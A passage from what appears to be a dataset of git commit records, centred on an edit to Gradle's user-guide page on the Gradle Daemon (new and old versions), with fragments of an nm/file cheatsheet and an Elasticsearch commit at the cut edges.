by default, nm shows the symbol: value, type and name.*\n\nbasic syntax:\n----\n$ nm \n----\n\n[NOTE]\n====\nif no file is provided, nm will inspect a.out\n====\n\ndisplay default information on executable (or object file):\n----\n$ nm foo\n----\n\ndisplay all the symbols in an executable:\n----\n$ nm -n foo\n----\n\ndisplay information about the size of a particular symbol, bar:\n----\n$ nm -n foo -S | grep bar\n----\n\nonly display information on external symbols:\n----\n$ nm -g foo\n----\n\n[index]\n== other utils\n=== file\n*get basic file information on a file(s).*\n\nbasic syntax:\n----\n$ file file\n----\n\nexample:\n----\n$ file foo\n\nfoo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU\/Linux 2.6.24, stripped\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e9f7ecc082599f982b06ccbbf9fccff801eed1ca","subject":"Removed out-dated advice about disabling the daemon for ephemeral CI builds.","message":"Removed out-dated advice about disabling the daemon for ephemeral CI builds.\n","repos":"blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/gradle_daemon.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/gradle_daemon.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[gradle_daemon]]\n= The Gradle Daemon\n\n[quote, Wikipedia]\nA daemon is a computer program that runs as a background process, rather than being under the direct control of an interactive user.\n\nGradle runs on the Java Virtual Machine (JVM) and uses several supporting libraries that require a non-trivial initialization time. As a result, it can sometimes seem a little slow to start. The solution to this problem is the Gradle _Daemon_: a long-lived background process that executes your builds much more quickly than would otherwise be the case. We accomplish this by avoiding the expensive bootstrapping process as well as leveraging caching, by keeping data about your project in memory. Running Gradle builds with the Daemon is no different than without. Simply configure whether you want to use it or not - everything else is handled transparently by Gradle.\n\n\n[[sec:why_the_daemon]]\n== Why the Gradle Daemon is important for performance\n\nThe Daemon is a long-lived process, so not only are we able to avoid the cost of JVM startup for every build, but we are able to cache information about project structure, files, tasks, and more in memory.\n\nThe reasoning is simple: improve build speed by reusing computations from previous builds. 
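A quick way to feel the difference on any project is to compare a cold, single-use JVM against a warm Daemon (illustrative commands; the built-in `help` task stands in for a real build):\n\n[source,bash]\n----\n# cold JVM on every invocation\n$ gradle --no-daemon help\n\n# the first run starts a Daemon, later runs reuse it\n$ gradle --daemon help\n$ gradle --daemon help\n----\n\n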
However, the benefits are dramatic: we typically measure build times reduced by 15-75% on subsequent builds. We recommend profiling your build by using `--profile` to get a sense of how much impact the Gradle Daemon can have for you.\n\nThe Gradle Daemon is enabled by default starting with Gradle 3.0, so you don't have to do anything to benefit from it.\n\n[[sec:status]]\n== Running Daemon Status\n\nTo get a list of running Gradle Daemons and their statuses use the `--status` command.\n\nSample output:\n[source]\n----\n PID VERSION STATUS\n 28411 3.0 IDLE\n 34247 3.0 BUSY\n----\n\n\nCurrently, a given Gradle version can only connect to daemons of the same version. This means the status output will only show Daemons for the version of Gradle being invoked and not for any other versions. Future versions of Gradle will lift this constraint and will show the running Daemons for all versions of Gradle.\n\n[[sec:disabling_the_daemon]]\n== Disabling the Daemon\n\nThe Gradle Daemon is enabled by default, and we recommend always enabling it. There are several ways to disable the Daemon, but the most common one is to add the line\n\n[source]\n----\norg.gradle.daemon=false\n----\n\nto the file `\u00abUSER_HOME\u00bb\/.gradle\/gradle.properties`, where `\u00abUSER_HOME\u00bb` is your home directory. That\u2019s typically one of the following, depending on your platform:\n\n* `C:\\Users\\<username>` (Windows Vista & 7+)\n* `\/Users\/<username>` (macOS)\n* `\/home\/<username>` (Linux)\n\nIf that file doesn\u2019t exist, just create it using a text editor. You can find details of other ways to disable (and enable) the Daemon in <<#daemon_faq,Daemon FAQ>> further down. That section also contains more detailed information on how the Daemon works.\n\nNote that having the Daemon enabled, all your builds will take advantage of the speed boost, regardless of the version of Gradle a particular build uses.\n\n[TIP]\n.Continuous integration\n====\n\nSince Gradle 3.0, we enable Daemon by default and recommend using it for both developers' machines and Continuous Integration servers. However, if you suspect that Daemon makes your CI builds unstable, you can disable it to use a fresh runtime for each build since the runtime is _completely_ isolated from any previous builds.\n\n====\n\n\n[[sec:stopping_an_existing_daemon]]\n== Stopping an existing Daemon\n\nAs mentioned, the Daemon is a background process. You needn\u2019t worry about a build up of Gradle processes on your machine, though. Every Daemon monitors its memory usage compared to total system memory and will stop itself if idle when available system memory is low. If you want to explicitly stop running Daemon processes for any reason, just use the command `gradle --stop`.\n\nThis will terminate all Daemon processes that were started with the same version of Gradle used to execute the command. If you have the Java Development Kit (JDK) installed, you can easily verify that a Daemon has stopped by running the `jps` command. 
You\u2019ll see any running Daemons listed with the name `GradleDaemon`.\n\n[[daemon_faq]]\n== FAQ\n\n\n[[sec:ways_to_disable_gradle_daemon]]\n=== How do I disable the Gradle Daemon?\n\nThere are two recommended ways to disable the Daemon persistently for an environment:\n\n* Via environment variables: add the flag `-Dorg.gradle.daemon=false` to the `GRADLE_OPTS` environment variable\n* Via properties file: add `org.gradle.daemon=false` to the `\u00abGRADLE_USER_HOME\u00bb\/gradle.properties` file\n\n[NOTE]\n====\n\nNote, `\u00abGRADLE_USER_HOME\u00bb` defaults to `\u00abUSER_HOME\u00bb\/.gradle`, where `\u00abUSER_HOME\u00bb` is the home directory of the current user. This location can be configured via the `-g` and `--gradle-user-home` command line switches, as well as by the `GRADLE_USER_HOME` environment variable and `org.gradle.user.home` JVM system property.\n\n====\n\nBoth approaches have the same effect. Which one to use is up to personal preference. Most Gradle users choose the second option and add the entry to the user `gradle.properties` file.\n\nOn Windows, this command will disable the Daemon for the current user:\n\n[source]\n----\n(if not exist \"%USERPROFILE%\/.gradle\" mkdir \"%USERPROFILE%\/.gradle\") && (echo. >> \"%USERPROFILE%\/.gradle\/gradle.properties\" && echo org.gradle.daemon=false >> \"%USERPROFILE%\/.gradle\/gradle.properties\")\n----\n\nOn UNIX-like operating systems, the following Bash shell command will disable the Daemon for the current user:\n\n[source,bash]\n----\nmkdir -p ~\/.gradle && echo \"org.gradle.daemon=false\" >> ~\/.gradle\/gradle.properties\n----\n\nOnce the Daemon is disabled for a build environment in this way, a Gradle Daemon will not be started unless explicitly requested using the `--daemon` option.\n\nThe `--daemon` and `--no-daemon` command line options enable and disable usage of the Daemon for individual build invocations when using the Gradle command line interface. These command line options have the _highest_ precedence when considering the build environment. Typically, it is more convenient to enable the Daemon for an environment (e.g. a user account) so that all builds use the Daemon without having to remember to supply the `--daemon` option.\n\n[[sec:why_is_there_more_than_one_daemon_process_on_my_machine]]\n=== Why is there more than one Daemon process on my machine?\n\nThere are several reasons why Gradle will create a new Daemon, instead of using one that is already running. The basic rule is that Gradle will start a new Daemon if there are no existing idle or compatible Daemons available. Gradle will kill any Daemon that has been idle for 3 hours or more, so you don't have to worry about cleaning them up manually.\n\nidle::\nAn idle Daemon is one that is not currently executing a build or doing other useful work.\ncompatible::\nA compatible Daemon is one that can (or can be made to) meet the requirements of the requested build environment. The Java runtime used to execute the build is an example aspect of the build environment. Another example is the set of JVM system properties required by the build runtime.\n\n\nSome aspects of the requested build environment may not be met by a Daemon. If the Daemon is running with a Java 8 runtime, but the requested environment calls for Java 10, then the Daemon is not compatible and another must be started. Moreover, certain properties of a Java runtime cannot be changed once the JVM has started. For example, it is not possible to change the memory allocation (e.g. 
`-Xmx1024m`), default text encoding, default locale, etc of a running JVM.\n\nThe \u201crequested build environment\u201d is typically constructed implicitly from aspects of the build client\u2019s (e.g. Gradle command line client, IDE etc.) environment and explicitly via command line switches and settings. See <<build_environment.adoc#build_environment,Build Environment>> for details on how to specify and control the build environment.\n\nThe following JVM system properties are effectively immutable. If the requested build environment requires any of these properties, with a different value than a Daemon\u2019s JVM has for this property, the Daemon is not compatible.\n\n* file.encoding\n* user.language\n* user.country\n* user.variant\n* java.io.tmpdir\n* javax.net.ssl.keyStore\n* javax.net.ssl.keyStorePassword\n* javax.net.ssl.keyStoreType\n* javax.net.ssl.trustStore\n* javax.net.ssl.trustStorePassword\n* javax.net.ssl.trustStoreType\n* com.sun.management.jmxremote\n\nThe following JVM attributes, controlled by startup arguments, are also effectively immutable. The corresponding attributes of the requested build environment and the Daemon\u2019s environment must match exactly in order for a Daemon to be compatible.\n\n* The maximum heap size (i.e. the -Xmx JVM argument)\n* The minimum heap size (i.e. the -Xms JVM argument)\n* The boot classpath (i.e. the -Xbootclasspath argument)\n* The \u201cassertion\u201d status (i.e. the -ea argument)\n\nThe required Gradle version is another aspect of the requested build environment. Daemon processes are coupled to a specific Gradle runtime. Working on multiple Gradle projects during a session that use different Gradle versions is a common reason for having more than one running Daemon process.\n\n[[sec:how_much_memory_does_the_daemon_use_and_can_i_give_it_more]]\n=== How much memory does the Daemon use and can I give it more?\n\nIf the requested build environment does not specify a maximum heap size, the Daemon will use up to 512MB of heap. It will use the JVM's default minimum heap size. 512MB is more than enough for most builds. Larger builds with hundreds of subprojects, lots of configuration, and source code may require, or perform better, with more memory.\n\nTo increase the amount of memory the Daemon can use, specify the appropriate flags as part of the requested build environment. Please see <<build_environment.adoc#build_environment,Build Environment>> for details.\n\n[[sec:how_can_i_stop_a_daemon]]\n=== How can I stop a Daemon?\n\nDaemon processes will automatically terminate themselves after 3 hours of inactivity or less. If you wish to stop a Daemon process before this, you can either kill the process via your operating system or run the `gradle --stop` command. The `--stop` switch causes Gradle to request that _all_ running Daemon processes, _of the same Gradle version used to run the command_, terminate themselves.\n\n[[sec:what_can_go_wrong_with_daemon]]\n=== What can go wrong with Daemon?\n\nConsiderable engineering effort has gone into making the Daemon robust, transparent and unobtrusive during day to day development. However, Daemon processes can occasionally be corrupted or exhausted. A Gradle build executes arbitrary code from multiple sources. 
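As a purely hypothetical illustration of such a defect, a build script that stashes data in static state leaks memory from build to build, because the Daemon can cache build script classes between invocations (a sketch, not taken from any real build):\n\n[source,groovy]\n----\n\/\/ build.gradle: ANTI-PATTERN, shown only to illustrate a Daemon memory leak\nclass Holder {\n \/\/ static state survives between builds inside the long-lived Daemon JVM\n static List<String> cache = []\n}\n\ntask leaky {\n doLast {\n \/\/ grows a little on every build executed by the same Daemon process\n Holder.cache << new File('big-input.txt').text\n }\n}\n----\n\n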
While Gradle itself is designed for and heavily tested with the Daemon, user build scripts and third party plugins can destabilize the Daemon process through defects such as memory leaks or global state corruption.\n\nIt is also possible to destabilize the Daemon (and build environment in general) by running builds that do not release resources correctly. This is a particularly poignant problem when using Microsoft Windows as it is less forgiving of programs that fail to close files after reading or writing.\n\nGradle actively monitors heap usage and attempts to detect when a leak is starting to exhaust the available heap space in the daemon. When it detects a problem, the Gradle daemon will finish the currently running build and proactively restart the daemon on the next build. This monitoring is enabled by default, but can be disabled by setting the `org.gradle.daemon.performance.enable-monitoring` system property to false.\n\nIf it is suspected that the Daemon process has become unstable, it can simply be killed. Recall that the `--no-daemon` switch can be specified for a build to prevent use of the Daemon. This can be useful to diagnose whether or not the Daemon is actually the culprit of a problem.\n\n[[sec:tools_and_ides]]\n== Tools & IDEs\n\nThe <<embedding.adoc#embedding,Gradle Tooling API>> that is used by IDEs and other tools to integrate with Gradle _always_ uses the Gradle Daemon to execute builds. If you are executing Gradle builds from within your IDE you are using the Gradle Daemon and do not need to enable it for your environment.\n\n[[sec:how_does_the_gradle_daemon_make_builds_faster]]\n== How does the Gradle Daemon make builds faster?\n\nThe Gradle Daemon is a _long lived_ build process. In between builds it waits idly for the next build. This has the obvious benefit of only requiring Gradle to be loaded into memory once for multiple builds, as opposed to once for each build. This in itself is a significant performance optimization, but that's not where it stops.\n\nA significant part of the story for modern JVM performance is runtime code optimization. For example, HotSpot (the JVM implementation provided by Oracle and used as the basis of OpenJDK) applies optimization to code while it is running. The optimization is progressive and not instantaneous. That is, the code is progressively optimized during execution which means that subsequent builds can be faster purely due to this optimization process. Experiments with HotSpot have shown that it takes somewhere between 5 and 10 builds for optimization to stabilize. The difference in perceived build time between the first build and the 10th for a Daemon can be quite dramatic.\n\nThe Daemon also allows more effective in memory caching across builds. For example, the classes needed by the build (e.g. plugins, build scripts) can be held in memory between builds. 
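One practical effect of this in-memory reuse is easy to observe: a warm Daemon rechecks an unchanged project almost instantly (illustrative output, timings will vary):\n\n[source,bash]\n----\n$ gradle build\nBUILD SUCCESSFUL in 24s\n\n$ gradle build\n> Task :compileJava UP-TO-DATE\nBUILD SUCCESSFUL in 1s\n----\n\n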
Similarly, Gradle can maintain in-memory caches of build data such as the hashes of task inputs and outputs, used for incremental building.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[gradle_daemon]]\n= The Gradle Daemon\n\n[quote, Wikipedia]\nA daemon is a computer program that runs as a background process, rather than being under the direct control of an interactive user.\n\nGradle runs on the Java Virtual Machine (JVM) and uses several supporting libraries that require a non-trivial initialization time. As a result, it can sometimes seem a little slow to start. The solution to this problem is the Gradle _Daemon_: a long-lived background process that executes your builds much more quickly than would otherwise be the case. We accomplish this by avoiding the expensive bootstrapping process as well as leveraging caching, by keeping data about your project in memory. Running Gradle builds with the Daemon is no different than without. Simply configure whether you want to use it or not - everything else is handled transparently by Gradle.\n\n\n[[sec:why_the_daemon]]\n== Why the Gradle Daemon is important for performance\n\nThe Daemon is a long-lived process, so not only are we able to avoid the cost of JVM startup for every build, but we are able to cache information about project structure, files, tasks, and more in memory.\n\nThe reasoning is simple: improve build speed by reusing computations from previous builds. However, the benefits are dramatic: we typically measure build times reduced by 15-75% on subsequent builds. We recommend profiling your build by using `--profile` to get a sense of how much impact the Gradle Daemon can have for you.\n\nThe Gradle Daemon is enabled by default starting with Gradle 3.0, so you don't have to do anything to benefit from it.\n\nIf you run CI builds in ephemeral environments (such as containers) that do not reuse any processes, use of the Daemon will slightly decrease performance (due to caching additional information) for no benefit, and may be disabled.\n\n[[sec:status]]\n== Running Daemon Status\n\nTo get a list of running Gradle Daemons and their statuses use the `--status` command.\n\nSample output:\n[source]\n----\n PID VERSION STATUS\n 28411 3.0 IDLE\n 34247 3.0 BUSY\n----\n\n\nCurrently, a given Gradle version can only connect to daemons of the same version. This means the status output will only show Daemons for the version of Gradle being invoked and not for any other versions. Future versions of Gradle will lift this constraint and will show the running Daemons for all versions of Gradle.\n\n[[sec:disabling_the_daemon]]\n== Disabling the Daemon\n\nThe Gradle Daemon is enabled by default, and we recommend always enabling it. 
There are several ways to disable the Daemon, but the most common one is to add the line\n\n[source]\n----\norg.gradle.daemon=false\n----\n\nto the file `\u00abUSER_HOME\u00bb\/.gradle\/gradle.properties`, where `\u00abUSER_HOME\u00bb` is your home directory. That\u2019s typically one of the following, depending on your platform:\n\n* `C:\\Users\\<username>` (Windows Vista & 7+)\n* `\/Users\/<username>` (macOS)\n* `\/home\/<username>` (Linux)\n\nIf that file doesn\u2019t exist, just create it using a text editor. You can find details of other ways to disable (and enable) the Daemon in <<#daemon_faq,Daemon FAQ>> further down. That section also contains more detailed information on how the Daemon works.\n\nNote that having the Daemon enabled, all your builds will take advantage of the speed boost, regardless of the version of Gradle a particular build uses.\n\n[TIP]\n.Continuous integration\n====\n\nSince Gradle 3.0, we enable Daemon by default and recommend using it for both developers' machines and Continuous Integration servers. However, if you suspect that Daemon makes your CI builds unstable, you can disable it to use a fresh runtime for each build since the runtime is _completely_ isolated from any previous builds.\n\n====\n\n\n[[sec:stopping_an_existing_daemon]]\n== Stopping an existing Daemon\n\nAs mentioned, the Daemon is a background process. You needn\u2019t worry about a build up of Gradle processes on your machine, though. Every Daemon monitors its memory usage compared to total system memory and will stop itself if idle when available system memory is low. If you want to explicitly stop running Daemon processes for any reason, just use the command `gradle --stop`.\n\nThis will terminate all Daemon processes that were started with the same version of Gradle used to execute the command. If you have the Java Development Kit (JDK) installed, you can easily verify that a Daemon has stopped by running the `jps` command. You\u2019ll see any running Daemons listed with the name `GradleDaemon`.\n\n[[daemon_faq]]\n== FAQ\n\n\n[[sec:ways_to_disable_gradle_daemon]]\n=== How do I disable the Gradle Daemon?\n\nThere are two recommended ways to disable the Daemon persistently for an environment:\n\n* Via environment variables: add the flag `-Dorg.gradle.daemon=false` to the `GRADLE_OPTS` environment variable\n* Via properties file: add `org.gradle.daemon=false` to the `\u00abGRADLE_USER_HOME\u00bb\/gradle.properties` file\n\n[NOTE]\n====\n\nNote, `\u00abGRADLE_USER_HOME\u00bb` defaults to `\u00abUSER_HOME\u00bb\/.gradle`, where `\u00abUSER_HOME\u00bb` is the home directory of the current user. This location can be configured via the `-g` and `--gradle-user-home` command line switches, as well as by the `GRADLE_USER_HOME` environment variable and `org.gradle.user.home` JVM system property.\n\n====\n\nBoth approaches have the same effect. Which one to use is up to personal preference. Most Gradle users choose the second option and add the entry to the user `gradle.properties` file.\n\nOn Windows, this command will disable the Daemon for the current user:\n\n[source]\n----\n(if not exist \"%USERPROFILE%\/.gradle\" mkdir \"%USERPROFILE%\/.gradle\") && (echo. 
>> \"%USERPROFILE%\/.gradle\/gradle.properties\" && echo org.gradle.daemon=false >> \"%USERPROFILE%\/.gradle\/gradle.properties\")\n----\n\nOn UNIX-like operating systems, the following Bash shell command will disable the Daemon for the current user:\n\n[source,bash]\n----\nmkdir -p ~\/.gradle && echo \"org.gradle.daemon=false\" >> ~\/.gradle\/gradle.properties\n----\n\nOnce the Daemon is disabled for a build environment in this way, a Gradle Daemon will not be started unless explicitly requested using the `--daemon` option.\n\nThe `--daemon` and `--no-daemon` command line options enable and disable usage of the Daemon for individual build invocations when using the Gradle command line interface. These command line options have the _highest_ precedence when considering the build environment. Typically, it is more convenient to enable the Daemon for an environment (e.g. a user account) so that all builds use the Daemon without requiring to remember to supply the `--daemon` option.\n\n[[sec:why_is_there_more_than_one_daemon_process_on_my_machine]]\n=== Why is there more than one Daemon process on my machine?\n\nThere are several reasons why Gradle will create a new Daemon, instead of using one that is already running. The basic rule is that Gradle will start a new Daemon if there are no existing idle or compatible Daemons available. Gradle will kill any Daemon that has been idle for 3 hours or more, so you don't have to worry about cleaning them up manually.\n\nidle::\nAn idle Daemon is one that is not currently executing a build or doing other useful work.\ncompatible::\nA compatible Daemon is one that can (or can be made to) meet the requirements of the requested build environment. The Java runtime used to execute the build is an example aspect of the build environment. Another example is the set of JVM system properties required by the build runtime.\n\n\nSome aspects of the requested build environment may not be met by an Daemon. If the Daemon is running with a Java 8 runtime, but the requested environment calls for Java 10, then the Daemon is not compatible and another must be started. Moreover, certain properties of a Java runtime cannot be changed once the JVM has started. For example, it is not possible to change the memory allocation (e.g. `-Xmx1024m`), default text encoding, default locale, etc of a running JVM.\n\nThe \u201crequested build environment\u201d is typically constructed implicitly from aspects of the build client\u2019s (e.g. Gradle command line client, IDE etc.) environment and explicitly via command line switches and settings. See <<build_environment.adoc#build_environment,Build Environment>> for details on how to specify and control the build environment.\n\nThe following JVM system properties are effectively immutable. If the requested build environment requires any of these properties, with a different value than a Daemon\u2019s JVM has for this property, the Daemon is not compatible.\n\n* file.encoding\n* user.language\n* user.country\n* user.variant\n* java.io.tmpdir\n* javax.net.ssl.keyStore\n* javax.net.ssl.keyStorePassword\n* javax.net.ssl.keyStoreType\n* javax.net.ssl.trustStore\n* javax.net.ssl.trustStorePassword\n* javax.net.ssl.trustStoreType\n* com.sun.management.jmxremote\n\nThe following JVM attributes, controlled by startup arguments, are also effectively immutable. 
[[sec:how_can_i_stop_a_daemon]]\n=== How can I stop a Daemon?\n\nDaemon processes will automatically terminate themselves after at most 3 hours of inactivity. If you wish to stop a Daemon process before this, you can either kill the process via your operating system or run the `gradle --stop` command. The `--stop` switch causes Gradle to request that _all_ running Daemon processes, _of the same Gradle version used to run the command_, terminate themselves.\n\n[[sec:what_can_go_wrong_with_daemon]]\n=== What can go wrong with the Daemon?\n\nConsiderable engineering effort has gone into making the Daemon robust, transparent and unobtrusive during day-to-day development. However, Daemon processes can occasionally be corrupted or exhausted. A Gradle build executes arbitrary code from multiple sources. While Gradle itself is designed for and heavily tested with the Daemon, user build scripts and third-party plugins can destabilize the Daemon process through defects such as memory leaks or global state corruption.\n\nIt is also possible to destabilize the Daemon (and the build environment in general) by running builds that do not release resources correctly. This is a particularly acute problem when using Microsoft Windows, as it is less forgiving of programs that fail to close files after reading or writing.\n\nGradle actively monitors heap usage and attempts to detect when a leak is starting to exhaust the available heap space in the daemon. When it detects a problem, the Gradle daemon will finish the currently running build and proactively restart the daemon on the next build. This monitoring is enabled by default, but can be disabled by setting the `org.gradle.daemon.performance.enable-monitoring` system property to false.\n\nIf it is suspected that the Daemon process has become unstable, it can simply be killed. Recall that the `--no-daemon` switch can be specified for a build to prevent use of the Daemon. This can be useful to diagnose whether or not the Daemon is actually the culprit of a problem.\n\n
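A minimal diagnostic sequence along these lines is sketched below; it assumes `gradle` and the JDK's `jps` tool are on your `PATH`, and `build` stands in for whatever task you normally run:\n\n[source,bash]\n----\njps | grep GradleDaemon    # list any running Daemon processes\ngradle --stop              # ask Daemons of this Gradle version to terminate\ngradle --no-daemon build   # re-run the build in a fresh, single-use process\n----\n\n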
[[sec:tools_and_ides]]\n== Tools & IDEs\n\nThe <<embedding.adoc#embedding,Gradle Tooling API>> that is used by IDEs and other tools to integrate with Gradle _always_ uses the Gradle Daemon to execute builds. If you are executing Gradle builds from within your IDE, you are already using the Gradle Daemon and do not need to enable it for your environment.\n\n[[sec:how_does_the_gradle_daemon_make_builds_faster]]\n== How does the Gradle Daemon make builds faster?\n\nThe Gradle Daemon is a _long-lived_ build process. In between builds it waits idly for the next build. This has the obvious benefit of only requiring Gradle to be loaded into memory once for multiple builds, as opposed to once for each build. This in itself is a significant performance optimization, but that's not where it stops.\n\nA significant part of the story for modern JVM performance is runtime code optimization. For example, HotSpot (the JVM implementation provided by Oracle and used as the basis of OpenJDK) applies optimizations to code while it is running. The optimization is progressive, not instantaneous: the code is optimized during execution, which means that subsequent builds can be faster purely due to this optimization process. Experiments with HotSpot have shown that it takes somewhere between 5 and 10 builds for optimization to stabilize. The difference in perceived build time between the first build and the 10th for a Daemon can be quite dramatic.\n\nThe Daemon also allows more effective in-memory caching across builds. For example, the classes needed by the build (e.g. plugins, build scripts) can be held in memory between builds. Similarly, Gradle can maintain in-memory caches of build data such as the hashes of task inputs and outputs, used for incremental building.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dafa78ec63a3e7c20f510d95fef286308444430d","subject":"Revert \"Doc: \/_reindex: Add a note about the source size parameter\"","message":"Revert \"Doc: \/_reindex: Add a note about the source size parameter\"\n\nThis reverts commit 
4de284866875b987110df66229fb7c7d0b9cd4d8.\n","repos":"scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra5-rc,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,dongjoon-hyun\/elasticsearch,sneivandt\/elasticsearch,liweinan0423\/elasticsearch,masaruh\/elasticsearch,trangvh\/elasticsearch,maddin2016\/elasticsearch,awislowski\/elasticsearch,Shepard1212\/elasticsearch,dpursehouse\/elasticsearch,trangvh\/elasticsearch,trangvh\/elasticsearch,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,avikurapati\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,mikemccand\/elasticsearch,robin13\/elasticsearch,mortonsykes\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,zkidkid\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,rajanm\/elasticsearch,zkidkid\/elasticsearch,markwalkom\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,girirajsharma\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,masaruh\/elasticsearch,MisterAndersen\/elasticsearch,njlawton\/elasticsearch,wuranbo\/elasticsearch,ZTE-PaaS\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,sreeramjayan\/elasticsearch,dongjoon-hyun\/elasticsearch,ricardocerq\/elasticsearch,jprante\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra5-rc,geidies\/elasticsearch,vroyer\/elasticassandra,Helen-Zhao\/elasticsearch,rajanm\/elasticsearch,nezirus\/elasticsearch,umeshdangat\/elasticsearch,LewayneNaidoo\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,myelin\/elasticsearch,zkidkid\/elasticsearch,fred84\/elasticsearch,ricardocerq\/elasticsearch,palecur\/elasticsearch,Shepard1212\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,HonzaKral\/elasticsearch,MaineC\/elasticsearch,Stacey-Gammon\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,fred84\/elasticsearch,spiegela\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,ricardocerq\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,JervyShi\/elasticsearch,lks21c\/elasticsearch,MaineC\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra5-rc,obourgain\/elasticsearch,nazarewk\/elasticsearch,avikurapati\/elasticsearch,sneivandt\/elasticsearch,JackyMai\/elasticsearch,gmarz\/elasticsearch,myelin\/elasticsearch,bawse\/elasticsearch,awislowski\/elasticsearch,uschindler\/elasticsearch,mikemccand\/elasticsearch,yanjunh\/elasticsearch,C-Bish\/elasticsearch,shreejay\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,pozhidaevak\/elasticsearch,a2lin\/elasticsearch,uschindler\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,avikurapati\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,winstonewert\/elasticsearch,cwurm\/elasticsearch,bawse\/elasticsearch,uschindler\/elasticsea
rch,C-Bish\/elasticsearch,glefloch\/elasticsearch,dpursehouse\/elasticsearch,masaruh\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,awislowski\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,JSCooke\/elasticsearch,sneivandt\/elasticsearch,girirajsharma\/elasticsearch,markwalkom\/elasticsearch,liweinan0423\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,girirajsharma\/elasticsearch,LewayneNaidoo\/elasticsearch,StefanGor\/elasticsearch,myelin\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,sreeramjayan\/elasticsearch,StefanGor\/elasticsearch,qwerty4030\/elasticsearch,mortonsykes\/elasticsearch,JSCooke\/elasticsearch,palecur\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,gfyoung\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,obourgain\/elasticsearch,zkidkid\/elasticsearch,yanjunh\/elasticsearch,JervyShi\/elasticsearch,maddin2016\/elasticsearch,JervyShi\/elasticsearch,bawse\/elasticsearch,MaineC\/elasticsearch,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,cwurm\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra5-rc,artnowo\/elasticsearch,geidies\/elasticsearch,cwurm\/elasticsearch,nazarewk\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,gmarz\/elasticsearch,JervyShi\/elasticsearch,gmarz\/elasticsearch,mjason3\/elasticsearch,wuranbo\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,ZTE-Paa